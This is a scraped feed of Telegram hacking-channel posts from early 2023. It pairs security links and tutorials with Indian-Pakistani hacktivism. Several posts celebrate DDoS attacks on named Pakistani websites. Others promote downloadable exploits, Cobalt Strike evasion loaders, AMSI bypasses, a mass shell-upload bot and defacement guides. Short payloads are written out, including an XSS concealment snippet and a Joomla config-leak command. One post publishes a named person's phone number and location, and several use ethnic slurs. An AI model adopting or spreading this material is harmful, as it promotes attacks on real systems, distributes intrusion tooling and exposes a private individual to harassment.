Dreamstime.com 😈DDoS Done😈After Bypassing CloudFlare 🖕https://check-host.net/check-report/ed5664dk4daDo Share And Support😈😈Evils Always Remains Evil😈https://t.me/DDoS_Evil
2023-03-01 01:31:01
📲ssl-kill-switch3 is a next-generation of iOS Tweak SSLKillSwitch(2) with much more functionality! Images
2023-02-28 08:23:05
http://www.kitploit.com/2023/02/ipgeo-tool-to-extract-ip-addresses-from.html
2023-02-28 00:25:03
Пакистан, видно что мы там делаем?🥹PHOENIX❤ Images
2023-02-27 13:45:53
🔥APT38 Tactic PoC for Stealing 0-days 💾program based on APT38 North Korea-backed hackers tactic that used in targeting security researchers using a malicious Visual Studio project file (vcxproj) to steal their 0days.💾Once the program runs, it will infect all of your Visual Studio projectsDownload:- https://system32.ink/news-feed/p/259/
2023-02-27 00:50:10
Шла вроде вторая неделя, я уже сбился со счета. Пакистану все так же похуй.
2023-02-26 04:44:29
Hello Guys,I am making an Private Page on start.me regarding OSINTSo if anyone wants to contribute or help me to make this project successful will be highly appreciated if you are interested please contact me at https://t.me/hacklathonalso if you want to be in my team please let me know.
2023-02-26 04:41:22
https://github.com/MrKingAnubis/OSINTMy own repo for OSINT
2023-02-25 15:35:06
https://osint.sh
2023-02-25 08:02:34
😈When an evil hurts...😈DDoS Done of Targetted Country😈😈😈😈😈😈😈😈😈😈List of Pakistani Websites:-https://bookme.pk/https://check-host.net/check-report/ec992eek303😈😈😈😈😈😈😈😈😈😈https://www.nts.org.pk/https://check-host.net/check-report/ec9950ak6d8😈😈😈😈😈😈😈😈😈😈https://www.sastaticket.pk/https://check-host.net/check-report/ec9963ckd1d😈😈😈😈😈😈😈😈😈😈https://digiskills.pk/https://check-host.net/check-report/ec9972ak405😈😈😈😈😈😈😈😈😈😈https://www.piac.com.pk/https://check-host.net/check-report/ec99930k475😈😈😈😈😈😈😈😈😈😈https://laam.pkhttps://check-host.net/check-report/ec99a2fk8d7😈😈😈😈😈😈😈😈😈😈https://www.pcb.com.pkhttps://check-host.net/check-report/ec99d2fk1e9😈😈😈😈😈😈😈😈😈😈https://www.pktrucks.comhttps://check-host.net/check-report/ec99f4fk8df😈😈😈😈😈😈😈😈😈😈https://priceoye.pk/https://check-host.net/check-report/ec9a387k6fc😈😈😈😈😈😈😈😈😈😈https://www.clicky.pk/https://check-host.net/check-report/ec9a416kdba😈😈😈😈😈😈😈😈😈😈https://www.pk-ent.com/https://check-host.net/check-report/ec9a4f8kcea😈😈😈😈😈😈😈😈😈😈😈For Support, Do Share As Much As Possible 😈https://t.me/DDoS_Evil
2023-02-25 07:59:49
https://www.cybersecuritymumbai.com/the-best-cyber-security-search-engines/
2023-02-25 02:16:53
🔥Arm Mali: insufficient cache invalidation for non-page-aligned user buffer importsWhen a user buffer is imported into Mali and mapped into the GPU, Mali calls dma_map_page(). This implicitly does a dcache_clean_poc() on the mapped range (unless the kernel knows that the device is DMA-coherent) to ensure that dirty cache state is written back to main memory before the user buffer can be accessed by the GPU and possibly also uncached mappings on the CPU.However, when a user buffer is imported that does not begin/end at page boundaries, Mali still installs PTEs on the CPU and GPU that map the entire page, but only calls dma_map_page() on the user-specified range. This means that the rest of the page is mapped without any cache maintenance.Therefore, when the GPU is not cache-coherent (which Jahn think means there's no ACE or ACE-Lite) or when Mali creates uncached CPU-side mappings, malicious code can read stale memory contents. This is a problem if the last cache writeback happened before the kernel's page allocator zeroed the page and handed it to userspace, since that means the stale data we're reading is whatever the previous user of the page wrote into it.
2023-02-25 01:54:25
https://github.com/trimstray/the-book-of-secret-knowledge
2023-02-24 20:43:22
A new blog on OSINT Bug Hunting seriesLearn dorks and filters of Shodan, LinkedIn, Dnsdumpster, GitHub dorks, Wayback machine, Google dorks and much more...Here is the link to the bloghttps://techofide.com/blogs/osint-framework-osint-for-bug-hunters-practical-demo-part-3/Haven't seen the first part? Here is the linkhttps://techofide.com/blogs/osint-framework-osint-for-bug-hunters-practical-demo-part-1/Haven't seen the second part?Here is the linkhttps://techofide.com/blogs/osint-framework-osint-for-bug-hunters-practical-demo-part-2/Join our group for such exclusive contentt.me/ethicalhackingtechofide
2023-02-24 16:33:45
⚠️⚠️⚠️⚠️⚠️⚠️⚠️Hello homies. Wait for uploading soon music share and support Wait wait every day 1 music upload soon and download linkI have 900 music you don't know how is good https://t.me/Darkwebmusician
2023-02-24 16:10:33
💥Fancy new way to conceal XSS payloads(Assignable protocol with location)<script>location.protocol='javascript'</script>
2023-02-24 12:17:17
OpenSSH 9.1 exploit and Mass ScanVulnerability CVE-2023-25136 affects the SSH pre-authentication process. Using it, an attacker can corrupt memory and execute arbitrary code on a machine without being authenticated on the target server.Download: https://system32.ink/news-feed/p/258/
2023-02-24 12:11:06
💥Patchless/breakpoint in process amsi bypass thingy with C#Download CS File:- https://system32.ink/news-feed/p/257/
2023-02-24 12:00:30
❤️KrishnaGyan.in is a fantastic website that offers a unique and exciting service similar to ChatGPT But Difreent is that its not ChatGPT All Your Answer Come Across To Our Bhagwat Geeta 🕉.Link : KrishnaGyan.in🤞Whether you want to know about science, technology, history, philosophy, or anything in between, KrishnaGyan.in has got you covered. It is designed to provide you with accurate and insightful answers to your queries, just like a human expert would.🛕Click Here To Visit
2023-02-24 02:23:09
CVE-2023-0754PTC Thingworx Edge C-SDK twHeader_fromStream Integer Overflow RCE VulnerabilityCVE-2023-0755PTC Thingworx Edge C-SDK mulitpartMessageStoreEntry_Create Array Indexing OOB Write RCE VulnerabilityDownload POC exploit: https://system32.ink/news-feed/p/249/
2023-02-23 21:12:57
Hi Everyone!A new Blog on Burp Suite.Let's learn how to use it like a Cyber Security ProfessionalA beginners blog to take your first step towards Burp Suite Here is the link 🔗https://techofide.com/blogs/what-is-burp-suite-how-to-use-burp-suite-burp-suite-tutorial-for-beginners/Join our group for such exclusive contentt.me/ethicalhackingtechofide
2023-02-23 15:26:01
https://github.com/MaximeBeasse/KeyDecoder
2023-02-23 11:14:30
💥PS script to exploit ESC1/retrieve your own NTLM password hash using only built-in Windows binaries to generate the PFX.Download: https://system32.ink/news-feed/p/248/
2023-02-22 12:18:46
https://system32.ink/lets-build-a-chrome-spy-extension-that-steals-everything/
2023-02-22 09:42:05
#Tools#ScriptKiddieshttps://github.com/hacktoolspack/hack-tools
2023-02-22 09:42:04
#Tools#ScriptKiddieshttps://github.com/dreddsa5dies/goHackTools
2023-02-22 01:31:54
BREAKING: Russian hacker group Phoenix announces hacking major ministries of Pakistan Govt.The group called the hack "hacking the whole Pakistan."ब्रेकिंग: रूसी हैकर समूह फीनिक्स ने पाकिस्तान सरकार के प्रमुख मंत्रालयों को हैक करने की घोषणा की।समूह ने हैक को "पूरे पाकिस्तान को हैक करना" कहा।https://twitter.com/_treeni/status/1628089198929670150🔺Just In: @AngrySaffron
2023-02-21 19:43:32
A blog on NmapLet's learn how to use Nmap.Nmap commandsNmap cheat sheetNmap techniquesHere is a link to the bloghttps://techofide.com/blogs/nmap-commands-how-to-use-nmap-tool-nmap-cheat-sheet/Join our group for more exclusive cyber security contentt.me/ethicalhackingtechofide
2023-02-21 13:50:14
🔥🔥🔥Fortinet FortiNAC CVE-2022-39952 Deep-Dive, PoC and IOCsAn external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.🔖PoC exploit here
2023-02-21 12:01:29
🔥🔥🔥REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB(CVE-2022-44563, Toc-ToU race condition vuln can be exploited to achieve arbitrary code execution )This is a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Taszk advisory for the vulnerability is published here. The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, Lorant Szabo describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
2023-02-21 11:31:00
https://check-host.net/check-report/ebd9e15k72b
2023-02-21 04:59:04
https://check-host.net/check-report/eb87291kd91https://check-host.net/check-report/eb878d7k490https://check-host.net/check-report/eb89a8bk9e8https://check-host.net/check-report/eb89dc7k992https://check-host.net/check-report/eb8a508k8e5https://check-host.net/check-report/eb8a788kea7https://check-host.net/check-report/eb8aa9fkfddhttps://check-host.net/check-report/eb8addck24fhttps://check-host.net/check-report/eb8b2b1k5dhttps://check-host.net/check-report/eb8ba6bk896Fuck Pakistan Bhen chod Team Insane PK Check Out These Sites🤣🤣🤣🤣😂😂🤣😂🤣😂
2023-02-20 07:54:59
​​CeWLCustom Word List generatorBased on a discussion on PaulDotCom (episode 129) about creating custom word lists spidering a targets website and collecting unique words I decided to write CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.https://github.com/digininja/CeWL
2023-02-20 07:54:58
​​CommixAutomated All-in-One OS Command Injection Exploitation Tool.https://github.com/commixproject/commix#best #redteam
2023-02-20 07:49:00
For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual reconhttps://github.com/lutfumertceylan/top25-parameter
2023-02-19 22:00:15
Wait is over!Here is the second part of the bug hunting seriesBug hunting with OSINTHere is the link https://techofide.com/blogs/osint-framework-osint-for-bug-hunters-practical-demo-part-2/Haven't seen the first part? Don't worry here is the link for that:Link for part 1:https://techofide.com/blogs/osint-framework-osint-for-bug-hunters-practical-demo-part-1/Join our group for such amazing and exclusive contentDon't miss here is the link to join our groupt.me/ethicalhackingtechofide
2023-02-19 02:54:09
Anonymous Spoof 😂😂 Porkies (pakistan/Bhikaristan)Now Anonymous Be Like:Humko barbad kardo B*******
2023-02-19 01:52:38
https://github.com/sbilly/awesome-security
2023-02-18 13:04:19
Kindly, Be assured that we will contribute in Pakistan's cyber defence & will keep access of everywhere in pakistan wherever they shift.
2023-02-18 06:51:41
https://system32.ink/system32-byte-5/
2023-02-18 00:49:09
महाशिवरात्रि कि हार्दिक शुभकामनाएं 🚩
2023-02-17 23:30:52
You can also join our group for such exclusive contentt.me/ethicalhackingtechofide
2023-02-17 23:30:01
Here is a video on Packet sniffingIf you like then Kindly subscribe and watch the video till end. It will be a great support from your side.Let's see A video on Packet sniffing https://youtu.be/TrBScuyA8IAJoin our group for Exclusive content t.me/ethicalhackingtechofide
2023-02-17 09:09:26
#Security#Toolshttps://github.com/punk-security/dnsReaperhttps://github.com/zeronetworks/BlueHoundhttps://github.com/mttaggart/security-toolshttps://github.com/zimawhit3/Bitmancerhttps://github.com/ffeelix/shape-security-decompiler-toolkithttps://github.com/jordanjoewatson/payloadkithttps://github.com/narkopolo/awesome-password-crackinghttps://github.com/jeffbencteux/mailsecchk
2023-02-17 05:41:49
https://blackdragonsec.org/website-defacement-tutorial/Learn Defecement with Phantom
2023-02-17 04:58:06
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 22:22:34
Hello everyoneA blog on packet sniffing using Wireshark for beginners who want to know how further use Wireshark.Let's see blog + videoLet's learn and growHere is a link to the bloghttps://techofide.com/blogs/what-is-packet-sniffing-how-to-perform-packet-sniffing-practical-demo-on-wireshark/Join our group for more cyber security content. We are helping beginners to start there career in Cyber securityHere is the link to our Security Groupt.me/ethicalhackingtechofide
2023-02-16 13:50:35
SSH-Remote-Code-Executionexploit:- https://system32.ink/news-feed/p/242/
2023-02-16 11:19:03
Cloud7 Bot 150$ For Free #GET SMTP/VPS/DATABASE From Config/Environment#WordPress Upload Shell (139 Exploit + Bypassing Shell)#WebMin 1,9xx Remote Code Execution#PresTaShop Upload Shell (57 Exploit +Bypassing Shell)#KcFinder,PHPUNIT,vBulletin,jQuery,osCommerce,Other Filemanager Mass upload shell#All CMS BRUTE FORCE 1000 WORDLISTS#Priv Bing Dorker 500 Page#Get IP From List Website #Joomla Upload Shell (102 Exploit + Bypassing Shell) <- Looping ExploitDownload:- https://system32.ink/members/mcracker2002/activity/241/
2023-02-16 10:17:25
#OSINT PART Xhttps://github.com/CYB3R-G0D/SPYhttps://github.com/fr4nc1stein/osint-frameworkhttps://github.com/spaceraccoon/manukahttps://github.com/TheBurnsy/Vehicle-OSINT-Collectionhttps://github.com/Astrosp/osint-toolshttps://github.com/WebBreacher/osinttoolshttps://github.com/spaceraccoon/manukahttps://github.com/cipher387/osint_stuff_tool_collectionhttps://github.com/XDeadHackerX/NetSoc_OSINyT/blob/main/README-English.mdhttps://github.com/seintpl/osint/blob/main/OSINT-SE-translated-articles.md
2023-02-15 18:39:30
Hi Everyone!We all know lot of network based attacks are happening with the help of WiresharkBut do we really know how to use the Wireshark.Let's learn in detail like a professional.Use Wireshark like a Cyber Security Professional.Here is the link to the bloghttps://techofide.com/blogs/how-to-use-wireshark-a-full-wireshark-tutorial-techofide/You can learn lot of cyber security stuff on my website techofide.comAlso join this group for more Cyber Security Professional contentt.me/ethicalhackingtechofide
2023-02-15 14:09:02
​​EdgeGPTReverse engineered API of Microsoft's Bing Chathttps://github.com/acheong08/EdgeGPT#GPT
2023-02-15 08:42:14
#Toolshttps://github.com/sX89q/leakshttps://github.com/Anlominus/Bug-Bounty
2023-02-15 00:13:59
✌️😎 I love trolling such madafaka tharki
2023-02-14 21:20:20
A new video on OSINT bug hunting.I recommend you to watch it and learn latest techniques of data gathering and reconnaissancehttps://youtu.be/HbYVR57LdEQ
2023-02-14 15:19:23
https://aamir.edo.org.pk https://aatif.edo.org.pk https://abd-al-ala.edo.org.pk https://abdul-aleem.emp.edo.org.pk https://abdul-ali.emp.edo.org.pk https://abdul-fattah.edo.org.pk https://abdul-jabbar.edo.org.pk https://abdul-mueed.edo.org.pk https://accollege.edo.org.pk https://ahmad.edo.org.pk https://ahmedcollege.edo.org.pk https://ahmedgaza.edo.org.pk https://al-hafiz.edo.org.pk https://al-quran.edo.org.pk https://al-raza.edo.org.pk https://ali.edo.org.pk https://azad.edo.org.pk#BlackDayForIndia #PakistanTerrorist #FckPak
2023-02-14 12:02:40
Yesterday I found a shell(backdoor) of a der-rupiya hackers probably sponsered by chavanni Intelligence agency in one of the Indian Govt website. The total number of govt website hosted on that server was 70+ there, so it means any or all 70 websites could have been defaced against Indian govt any time, or could have been used in other mean.It was part of my official work so can't disclose more about website or servers in this channel and you must be aware that these things doesn't come out.Although, Vulnerabilities is patched.The shell implant date was of 26th January 2023, the same timeline when nagpur shell implant/leak occurred.It's good that one foothold was removed but one man can't do everything, all the geeks should contribute and report at least pass the Intel's to make Indian cyberspace safe.Don't think what the country will give you, think what you will give to the country.Winding up, You know what fun is still remaining about those (Script-kiddies) ? They dropped shell and trace of Indonasian hackers. Waah Tatte Pakistan Waaah. 😂 Sale apn yahan chaal se pehchaan lete hai kon belly dancer hai or kon bar dancer... 😉 😆😆
2023-02-14 09:17:54
https://system32.ink/automating-blind-sql-injection-using-python/
2023-02-14 07:25:29
SALUTES OUR MARYTYRS OF PULWAMA ATTACK#PulwamaAttack#blackday
2023-02-13 21:30:54
Hello everyone! Here is our new article on Aircrack-ngThis will show you everything that you need to learn before start with a practical demonstrationBlog + Videohttps://techofide.com/blogs/how-to-use-aircrack-ng-aircrack-ng-tutorial-practical-demonstration/
2023-02-13 16:05:45
📕Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
2023-02-13 09:44:59
http://hunter.how
2023-02-12 15:22:45
​​DDoS-Protection-LiteAnti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.https://github.com/CleanTalk/anti-ddos-lite
2023-02-12 14:08:40
🔓CVE-2022-23935 exploit PoC exiftool version 12.37Usage:./CVE-2022-23935 <IP> <PORT>Download: https://system32.ink/news-feed/p/239/
2023-02-12 12:32:47
​​ConfFuzzFuzzing for Interface VulnerabilitiesConfFuzz is an in-memory fuzzer aimed at detecting interface vulnerabilities in compartmentalized contexts. ConfFuzz is a cooperation between the University of Manchester, University Politehnica of Bucharest, Rice University, and Unikraft.io. It has been accepted to appear in NDSS'23.https://github.com/conffuzz/conffuzz
2023-02-12 12:28:54
ExploitLeakedHandle: Identify and exploit leaked handles for local privilege escalationhttps://github.com/0x00Check/ExploitLeakedHandle
2023-02-11 14:52:07
Hey everyone!Check out our another blog on SQL Injection.SQL Injection attack | Prevention| Cyber Security ProfessionalsLet's learn and grow together https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/
2023-02-11 13:45:24
BokuLoader | is a Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.Now supports: sleepmask, cleanup, and obfuscate evasion features!Download: https://system32.ink/news-feed/p/238/
2023-02-11 11:44:48
https://abhijithb200.github.io/investigator/
2023-02-11 11:44:47
https://github.com/pawlaczyk/sarenka
2023-02-11 11:04:14
Resources for Reverse Engineering Online Games#cybersecurity #infosec #hackinghttps://github.com/dsasmblr/game-hacking
2023-02-11 03:25:30
🔥🔥🔥glibc-2.37 - incorrect printf output for integers with thousands separator and width field(CVE-2023-25139, BOF)sprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.Consider the following C program:#include <stdio.h>#include <locale.h>int main (void){ if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); } return 0;}and try it with a locale that has a thousands separator, such as "LC_ALL=en_US.utf8".With glibc up to 2.36, Vincent get as expected:1234567890123:+1,234,567 :Confirmed that this could potentially cause a buffer overflow with sprintf, something like below. This will occur in the corner case where an application computes the size of buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.#include <stdio.h>#include <locale.h>#include <string.h>int main (void){ char buf[strlen ("1234567890123:") + 1]; __builtin_memset (buf, 'x', sizeof (buf)); if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); sprintf (buf, "%0+ -'13ld:", 1234567L); for (size_t i = 0; i < strlen ("1234567890123:") + 1; i++) { printf ("%c", buf[i]); } printf ("\n"); } return 0;}To finish, building with _FORTIFY_SOURCE should catch this problem immediately:💾$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.cAnd run:💾$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ld-linux-x86-64.so.2 --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test1234567890123:+1,234,567 :*** buffer overflow detected ***: terminatedAborted (core dumped)🛡Fixed here( github mirror, backport to release/2.37/master ): "Account for grouping in printf width".
2023-02-11 03:02:35
http://elsnik6ievn7i7lbqttxrfen5ryqglmyt2ys3k4lbfkkmeluuhbcwbqd.onion
2023-02-10 12:35:29
https://github.com/mrh0wl/Cloudmare
2023-02-10 12:35:28
https://github.com/lijiejie/EasyPen
2023-02-10 11:54:38
Huge !! ❤️ 🇮🇳Probably In response of recent MEA mail Server attack APT Group Sidewinders Hackers Have Compromised 7.5 TB of Email and Official Data Of Ministry Of Foreign Affairs Pakistan.Indian Email Data of Almost 25GB was on darkweb. Investigation of Indian mail server breach is already in process.
2023-02-10 11:26:26
https://system32.ink/system32-byte-4/
2023-02-10 09:46:53
0Day Avalanche Blockchain API Dos POC Videohttps://system32.ink/news-feed/p/235/
2023-02-10 09:36:35
OWASP WrongSecrets | Vulnerable app with examples showing how to not use secretshttps://system32.ink/news-feed/p/234/
2023-02-10 07:00:41
@sidewinders
2023-02-10 06:54:10
Ministry of Foreign Affairs Pakistan7.5 TB of Internal & Email Data is compromised. Few Samples Attached@sidewinders
2023-02-10 05:38:17
Join https://t.me/sidewinders
2023-02-10 05:35:20
Pakistani Diplomat Sexual Harassment with Amna Umer Barcelona.
2023-02-10 01:17:39
FATF PAKISTAN MEETING WAS BREACHED.Just Before being out of Grey List.
2023-02-09 15:24:07
This time not only blog but let's learn with a detailed step by step videoIf you like our content then please support us by subscribing and watching full video.Let's grow and spread Cyber Security https://youtu.be/83DEdhCQCR8
2023-02-09 15:17:03
A new Blog on Metasploit.Learn Metasploit in professional way like Cyber security professionals.Here is the link to the detailed blog.https://techofide.com/blogs/how-to-use-metasploit-metasploit-commands-metasploit-tutorial/
2023-02-09 14:36:31
Today I ffound A so cold FB,Insta And Google HackerTelegram Name:- SavataHer no. +91 63628 93283Real_Name : rajni kaneriLocation: karnataka
2023-02-09 11:00:52
🧰OperatorsKit is a collection of tools that integrate with Cobalt Strike through BOFs.Link:- https://system32.ink/news-feed/p/233/
2023-02-09 10:06:25
IoT-PTA Virtual environment for Pentesting IoT Deviceshttps://system32.ink/news-feed/p/232/
2023-02-09 09:50:22
You don't need to buy a GPU for machine learning work!There are other alternatives. Here are some:1. Google Colab2. Kaggle3. Deepnote4. AWS SageMaker5. GCP Notebooks6. Azure Notebooks7. Cocalc8. Binder9. Saturncloud10. Datablore11. IBM Notebooks Spend your time focusing on your problem.💪💪 Let others worry about the hardware!!
2023-02-09 07:21:53
ssc-asi-tools - SecurityScorecard Attack Surface Intelligence tools repository with a python suite of tools.Link:- https://system32.ink/news-feed/p/231/
2023-02-08 17:54:03
CVE-2022-23087https://github.com/synacktiv/bhyve
2023-02-08 17:54:02
https://github.com/c4s73r/NetworkNightmare
2023-02-08 17:22:44
Blue Team / Incident Respornse 👨‍💻This github repository contains a collection of 35+ tools and resources that can be useful for blue teaming activities. https://github.com/A-poc/BlueTeam-Tools#Cybersecurity #BlueTeam #Infosec
2023-02-08 16:58:20
https://github.com/sundowndev/hacker-roadmap
2023-02-08 09:21:48
Recovery script for ESXiArgs ransomwareRecovery Script:- https://system32.ink/news-feed/p/229/
2023-02-07 10:10:28
https://system32.ink/getting-started-with-bug-bounty-programs-a-guide-for-beginner-hunters/
2023-02-07 09:32:45
Mobile Application Penetration Testing Cheat Sheet 📒#Infosec #Android #Ios #Tech #Cyber #BugBounty #Securityhttps://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
2023-02-07 09:31:21
Mini description of linux file permissions. Found this helpful!#Linux #infosec #cybersecurity
2023-02-07 05:27:04
exploit for an actively exploited zero-day vulnerability affecting the GoAnywhere MFT administration consoles.Exploit: https://system32.ink/news-feed/p/227/
2023-02-07 01:19:18
https://github.com/s0md3v/Photon
2023-02-07 01:19:17
https://github.com/Postuf/telegram-osint-lib
2023-02-06 14:06:32
Apache SCXML RCE (PoC included) + ArticleLink:- https://system32.ink/news-feed/p/225/
2023-02-06 13:35:29
A new post for those who want to learn Metasploit and Meterpreter.Hi Cyber learnersCheck my new post + Video on Metasploit and Meterpreter.How to Use Metasploit | Meterpreter | Reverse shell | Metasploit Tutorialhttps://techofide.com/blogs/how-to-use-metasploit-meterpreter-reverse-shell-metasploit-tutorial/
2023-02-06 11:13:59
All Common Ports Enumerations and Exploitationshttps://pentestbook.six2dez.com/enumeration/ports
2023-02-06 10:24:47
https://system32.ink/fuzzing-in-web-application-security/
2023-02-06 08:22:22
A public collection of POCs & Exploits for the vulnerabilities I discoveredhttps://system32.ink/news-feed/p/223/
2023-02-05 18:03:51
http://findyoutubevideo.thetechrobo.ca
2023-02-05 18:03:50
http://github.com/pr0xh4ck/web-recon
2023-02-05 13:00:40
Hi, all a new blog on Smurf attack is now hereLearn the technique to perform this Ddos attack.Here is the link to the bloghttps://techofide.com/blogs/what-is-smurf-attack-what-is-the-denial-of-service-attack-practical-ddos-attack-step-by-step-guide/
2023-02-05 06:07:31
SCRIPT HTTP-SQL-INJECTION (NMAP)download
2023-02-04 16:10:35
Microsoft Exchange: OWASSRF + TabShell (CVE-*2022-41076)*The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.For a detailed write see research: https://blog.viettelcybersecurity.com/tabshell-owassrf/*PoC: *https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e#owa #ssrf #tabshell #poc@virus303@NetEditors
2023-02-04 15:27:28
📡Space Jam: Exploring Radio Frequency Attacks in Outer SpaceDownload:- https://system32.ink/news-feed/p/220/
2023-02-04 14:53:20
CVE-2021-21974 | Ransomware targeting VMware ESXiThese attacks are detected globally and especially in Europe. According to experts from the ecosystem as well as autorities, they might be related to Nevada ransomware and are using CVE-2021-21974 (OpenSLP as used in ESXi has a heap-overflow vulnerability) as compromission vector. Investigation are still ongoing to confirm those assumptions.Exploit:- https://system32.ink/news-feed/p/219/
2023-02-04 12:29:43
Want to learn about OSINT (Open Source Threat Intelligence and Threat Intelligence Tools?Check our new blog on:What is OSINT? | OSINT Framework | Tools for OSINT | Best OSINT TechniquesHere is the link to his blog.  https://techofide.com/blogs/what-is-osint-osint-framework-tools-for-osint-best-osint-techniques/
2023-02-04 12:05:07
CVE-2023-25135vBulletin - RCE + exploitLink:- https://system32.ink/news-feed/p/217/
2023-02-04 10:10:09
CVE-2022-22583 CVE-2022-22616 CVE-2022-22639 CVE-2022-26690 CVE-2022-26712 CVE-2022-26728 CVE-2022-32786 CVE-2022-32800https://github.com/jhftss/POC
2023-02-04 08:35:58
🪂 Standout as Web design Expert Course 🪂Download link-https://mega.nz/folder/y3AkFAjT#j8-rd4vmddGn4utAgDITPQ🔐 Zip Password- @udemyking1✦•━━━━━━━━━━━━━━━━━•✦👉 𝑀𝑢𝑠𝑡 𝐿𝑖𝑘𝑒 & 𝐹𝑜𝑙𝑙𝑜𝑤 𝑂𝑢𝑟 𝑃𝑎𝑔𝑒𝑠👇🔷 𝒀𝒐𝒖𝑻𝒖𝒃𝒆 ➛ bit.ly/UFC-YouTube🔶 𝑭𝒂𝒄𝒆𝒃𝒐𝒐𝒌 ➛ fb.me/UdemyKing🔷 𝑳𝒊𝒏𝒌𝒆𝒅𝑰𝒏 ➛ bit.ly/UFC-linkedin🔶 𝑰𝒏𝒔𝒕𝒂𝒈𝒓𝒂𝒎 ➛ bit.ly/UFC-Insta🔷 𝑱𝒐𝒊𝒏 𝑭𝒂𝒔𝒕 ➛ t.me/UdemyKing1✦•━━━━━━━━━━━━━━━━━•✦
2023-02-03 22:28:22
https://github.com/tjnull/TJ-OSINT-Notebook
2023-02-03 22:28:21
https://github.com/fr4nc1stein/osint-framework
2023-02-03 14:54:19
https://system32.ink/system32-byte-3/
2023-02-03 11:42:03
https://system32.ink/web-stories/most-essential-penetration-testing-tools/
2023-02-03 08:37:11
💥Cobalt Strike BOF that bypasses AMSI in a remote process with code injection.Download:- https://system32.ink/news-feed/p/214/
2023-02-03 08:36:23
Needle (CVE-2023-0179) exploitDownload:- https://system32.ink/news-feed/p/215/
2023-02-03 08:33:23
💥If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE.
2023-02-02 23:00:59
🔥🔥🔥Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit(CVE-2023-21608)Download: https://system32.ink/news-feed/p/212/
2023-02-02 22:49:09
🔥Chrome heap buffer overflow in validating command decoder(CVE-2022-4135) Heap BoF/OOB access in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a SBX via a crafted HTML page.🛡Patch CLExploit strategy:The vulnerability immediately provides an attacker with an extremely powerful exploitation primitive -- a non-linear BoF with a controlled offset.Exploit flow:The exploit abuses the command buffer and GLES2 APIs for memory manipulation. A corrupted memory bucket is used to first leak data from the GPU process and break ASLR, and then, when the ROP chain is ready, hijack the control flow.reproduce:<script> canvas = document.createElement("canvas"); document.documentElement.appendChild(canvas); context = canvas.getContext("webgl2"); context.blendColor(0, 0, 0, 0);</script>⚠️Part of an exploit chain: CVE-2022-4135 + CVE-2022-3723
2023-02-02 22:42:46
🔥Brave browser 1 day exploit.This is a remote crash that triggers in brave browser due to how the rss XML parsing happens by reading an item's title that contains the < (less than) character.Download: https://system32.ink/news-feed/p/211/
2023-02-02 18:45:54
https://hacklido.com/blog/273-windows-forensics-the-art-of-investigating-part-2
2023-02-02 11:45:06
https://system32.ink/mssql-injection-advanced-tricks/
2023-02-02 10:01:44
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6download: https://system32.ink/news-feed/p/209/
2023-02-02 09:48:32
#RedTeam #hack #toolsCollection of 100+ tools and resources that can be useful for red teaming activities.https://github.com/A-poc/RedTeam-Tools
2023-02-02 09:23:49
📲Enzyme is an jailbreak-free iOS modding framework that allows you to statically patch and hook iOS apps. This repository contains an example using Enzyme. For modifying this, check out the CMakeLists.txt file, the patcher/main.py file, the patcher/bootstrap.asm file, and the src folder.Download:- https://system32.ink/news-feed/p/207/
2023-02-02 05:04:52
